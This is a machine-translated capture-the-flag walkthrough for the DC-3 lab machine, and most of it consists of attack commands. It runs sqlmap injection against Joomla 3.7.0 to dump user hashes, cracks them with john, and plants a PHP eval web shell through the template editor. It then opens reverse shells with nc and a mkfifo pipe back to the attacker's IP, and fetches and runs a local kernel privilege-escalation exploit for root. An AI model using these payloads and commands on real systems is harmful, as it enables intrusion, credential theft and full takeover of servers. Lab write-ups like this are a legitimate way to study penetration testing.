Target machine link: https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg
Extraction code: 0na8
First check the ip address of the local machine kali: 192.168.159.145
ifconfig
uses nmap to scan the IP of the target machine
nmap -sP 192.168.159.1/24
Check the mac address of the target machine
Open the virtual machine settings, click on the network adapter - advanced
match according to the mac address of the target machine The scan results of nmap confirm that the IP of the target machine is 192.168.159.141
Use nmap to perform a full scan
nmap -A 192.168.159.141 -p 1-65535 
and find that port 80 is open, try to access it using a browser 
Use fingerprint identification to identify
whatweb http://192.168.159.141/
The results show that the target machine uses the Apache platform and the server is Ubuntu
Use joomscan to scan
joomscan --url http://192.168.159.141/
The result shows that the background of the website has been scanned, use a browser to access
http://192.168.159.141/administrator/
The background of the website is joomla 3.7.0 template.
Find the template vulnerability
searchsploit joomla 3.7.0,
copy the result to the current directory and check
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt
cat joomalv370_sqli.txt
found injection Point
use sqlmap to list the database library name
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list [fullordering]
List all table names of joomladb
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 - -random-agent -D "joomladb" --tables -p list[fullordering]
Found #_users table
List the field types of users table
sqlmap -u "http://192.168.159.141/index.php?option=com_fields&view=fields&layout =modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering] List account passwords using the
john
tool Crack password
vim joom.txt
john joom.The txt
result shows that the password is snoopy
and enters the background to find
He told us that there is only one target of DC-3 actual combat to obtain root privileges.
There is a beez3 template in this directory.
After entering, we found that there is a new file that can edit the file. Consider uploading the Trojan.
To upload the Trojan, we must first find the current file. Directory
The directory is http://192.168.159.141/templates/beez3/html/
Go back to the page just now and click new file
to create a php file under html
Edit file
Here is a word Trojan horse wrong, it should be @eval($_REQUEST[ '123'])
try to access this file, and the execution is successful.
Use Ant Sword to connect,
right-click to connect to open a virtual terminal ,
and use commands to view basic information.
Rebound shell, kali local monitoring
nc -lvvp 2333
Ant Sword virtual terminal
nc -e /bin/bash 192.168.159.145 2333
The -e parameter is not available
Execute the command
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.145 2333 >/tmp/f can know the current
target Machine system is Ubuntu 16.04
searchsploit ubuntu 16.04
copy files
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt
Since the computer cannot access foreign websites, use the network disk to download exp
EXP resource
link: https://pan.baidu.com/s/1AeuJrP- T6elka5aZP9KL9g
extraction code: 0fkw
Be careful not to decompress the compressed package here.
Start the apache2 service of kali: service apache2 start
Copy the file to the web directory: cp -r 39772 /var/www/html
Execute the command wget http://192.168.159.145/39772 on the target machine. zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
